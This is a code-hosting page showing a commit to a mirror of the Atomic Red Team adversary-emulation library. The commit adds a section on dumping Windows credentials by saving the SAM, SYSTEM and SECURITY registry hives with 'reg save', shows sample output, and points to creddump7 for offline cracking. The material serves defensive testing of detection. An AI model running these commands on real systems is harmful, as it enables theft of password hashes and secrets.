infosecn1nja
/
atomic-red-team
mirror of https://github.com/infosecn1nja/atomic-red-team.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

cred dumping using the registry

patch-8
llandeilocymro 2018-03-16 14:24:17 +00:00 committed by GitHub
parent fdde68b5e7
commit c3bda067e2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
Windows/Credential_Access/Credential_Dumping.md
View File

@ -34,3 +34,17 @@ Output:
C:\>type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
C:\>
## via Registry
Local SAM (sam & system), cached credentials (system & security) and LSA secrets (system & security) can be enumerated via three registry keys.
Input:
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
Output:
C:\>reg save HKLM\sam sam
The operation completed successfully.
These hives can be prcossed locally using creddump7 (https://github.com/Neohapsis/creddump7)